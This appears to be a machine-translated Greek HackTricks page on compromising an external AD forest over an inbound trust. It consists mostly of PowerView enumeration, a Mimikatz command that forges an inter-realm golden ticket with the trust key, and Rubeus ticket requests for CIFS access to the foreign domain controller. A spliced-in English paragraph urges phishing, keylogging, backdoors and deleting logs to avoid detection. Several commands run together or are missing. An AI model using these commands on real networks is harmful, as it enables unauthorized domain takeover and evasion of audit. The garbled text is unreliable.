Εργάζεστε σε μια εταιρεία κυβερνοασφάλειας; Θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks; Ή θέλετε να έχετε πρόσβαση στην τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF; Ελέγξτε τα ΠΑΚΕΤΑ ΣΥΝΔΡΟΜΗΣ!
Σε αυτό το σενάριο, ένα εξωτερικό τομέα εμπιστεύεται εσάς (ή και οι δύο εμπιστεύονται ο ένας τον άλλο), έτσι ώστε να μπορείτε να αποκτήσετε κάποια είδους πρόσβαση σε αυτόν.
Απαρίθμηση
Καταρχήν, πρέπει να απαριθμήσετε την εμπιστοσύνη:
Get-DomainTrustSourceName : a.domain.local --> Current domainTargetName : domain.external --> Destination domainTrustType : WINDOWS-ACTIVE_DIRECTORYTrustAttributes :TrustDirection : Inbound --> Inboud trustWhenCreated : 2/19/202110:50:56 PMWhenChanged : 2/19/202110:50:56 PM# Get name of DC of the other domainGet-DomainComputer-Domain domain.external -Properties DNSHostNamednshostname-----------dc.domain.external# Groups that contain users outside of its domain and return its membersGet-DomainForeignGroupMember-Domain domain.externalGroupDomain : domain.externalGroupName : AdministratorsGroupDistinguishedName : CN=Administrators,CN=Builtin,DC=domain,DC=externalMemberDomain : domain.externalMemberName : S-1-5-21-3263068140-2042698922-2891547269-1133MemberDistinguishedName : CN=S-1-5-21-3263068140-2042698922-2891547269-1133,CN=ForeignSecurityPrincipals,DC=domain,DC=external# Get name of the principal in the current domain member of the cross-domain groupConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1133DEV\External Admins# Get members of the cros-domain groupGet-DomainGroupMember-Identity "External Admins"| select MemberNameMemberName----------crossuser# Lets list groups members## Check how the "External Admins" is part of the Administrators group in that DCGet-NetLocalGroupMember-ComputerName dc.domain.externalComputerName : dc.domain.externalGroupName : AdministratorsMemberName : SUB\External AdminsSID : S-1-5-21-3263068140-2042698922-2891547269-1133IsGroup : TrueIsDomain : True# You may also enumerate where foreign groups and/or users have been assigned# local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
Στην προηγούμενη αναγνώριση βρέθηκε ότι ο χρήστης crossuser βρίσκεται μέσα στην ομάδα External Admins που έχει δικαιώματα διαχειριστή μέσα στο DC του εξωτερικού τομέα.
Αρχική Πρόσβαση
Εάν δεν βρήκατε κάποια ειδική πρόσβαση του χρήστη σας στον άλλο τομέα, μπορείτε ακόμα να επιστρέψετε στην Μεθοδολογία AD και να προσπαθήσετε να αναβαθμίσετε τα δικαιώματα από έναν μη προνομιούχο χρήστη (πράγματα όπως το kerberoasting για παράδειγμα):
Μπορείτε να χρησιμοποιήσετε τις λειτουργίες του Powerview για να αναγνωρίσετε τον άλλο τομέα χρησιμοποιώντας την παράμετρο -Domain όπως εδώ:
Χρησιμοποιώντας μια κανονική μέθοδο με τα διαπιστευτήρια των χρηστών που έχουν πρόσβαση στον εξωτερικό τομέα, θα πρέπει να μπορείτε να αποκτήσετε πρόσβαση:
Μπορείτε επίσης να καταχραστείτε το SID History σε ένα δάσος εμπιστοσύνης.
Εάν ένας χρήστης μεταφερθεί από ένα δάσος σε ένα άλλο και δεν είναι ενεργοποιημένο το SID Filtering, τότε είναι δυνατό να προστεθεί ένα SID από το άλλο δάσος, και αυτό το SID θα προστεθεί στο token του χρήστη κατά την πιστοποίηση σε όλη την εμπιστοσύνη.
Για να θυμηθείτε, μπορείτε να λάβετε το κλειδί υπογραφής με την εντολή
Μπορείτε να υπογράψετε με το αξιόπιστο κλειδί ένα TGT που προσωποποιεί τον χρήστη της τρέχουσας domain.
# Get a TGT for the cross-domain privileged user to the other domainInvoke-Mimikatz -Command '"kerberos::golden /user:<username> /domain:<current domain> /SID:<current domain SID> /rc4:<trusted key> /target:<external.domain> /ticket:C:\path\save\ticket.kirbi"'
# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:C:\path\save\ticket.kirbi /nowrap
# Now you have a TGS to access the CIFS service of the domain controller
Πλήρης τρόπος εκμετάλλευσης ταυτότητας χρήστη
To fully impersonate a user, follow these steps:
Obtain the user's credentials: This can be done through various methods such as phishing, keylogging, or password cracking.
Gain administrative privileges: If the user does not have administrative privileges, escalate your privileges to gain full control over the system.
Impersonate the user: Use the obtained credentials to log in as the user. This can be done by using tools like Mimikatz to extract and inject the user's credentials.
Maintain persistence: To ensure continued access, establish persistence mechanisms such as creating a backdoor or modifying system settings.
Cover your tracks: Delete any logs or traces of your activities to avoid detection.
By following these steps, you can fully impersonate a user and gain unauthorized access to their accounts and resources.
# Get a TGT of the user with cross-domain permissionsRubeus.exe asktgt /user:crossuser /domain:sub.domain.local /aes256:70a673fa756d60241bd74ca64498701dbb0ef9c5fa3a93fe4918910691647d80 /opsec /nowrap
# Get a TGT from the current domain for the target domain for the userRubeus.exe asktgs /service:krbtgt/domain.external /domain:sub.domain.local /dc:dc.sub.domain.local /ticket:doIFdD[...snip...]MuSU8= /nowrap
# Use this inter-realm TGT to request a TGS in the target domain to access the CIFS service of the DC## We are asking to access CIFS of the external DC because in the enumeration we show the group was part of the local administrators group
Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /dc:dc.domain.external /ticket:doIFMT[...snip...]5BTA== /nowrap
# Now you have a TGS to access the CIFS service of the domain controller
Εργάζεστε σε μια εταιρεία κυβερνοασφάλειας; Θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks; Ή θέλετε να έχετε πρόσβαση στην τελευταία έκδοση του PEASS ή να κατεβάσετε το HackTricks σε μορφή PDF; Ελέγξτε τα ΠΑΚΕΤΑ ΣΥΝΔΡΟΜΗΣ!
